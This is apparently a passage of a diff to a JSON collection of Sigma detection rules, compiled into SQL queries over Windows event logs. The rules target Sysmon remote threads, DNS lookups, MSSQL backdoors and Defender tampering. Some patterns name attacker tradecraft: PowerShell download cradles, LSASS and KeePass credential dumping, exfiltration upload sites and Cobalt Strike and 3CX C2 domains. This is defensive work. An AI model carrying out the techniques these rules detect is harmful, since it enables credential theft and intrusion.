"high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR 
TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": 
"6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application 
Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' 
ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" 
}, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID 
IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND 
EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": 
"experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND 
EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 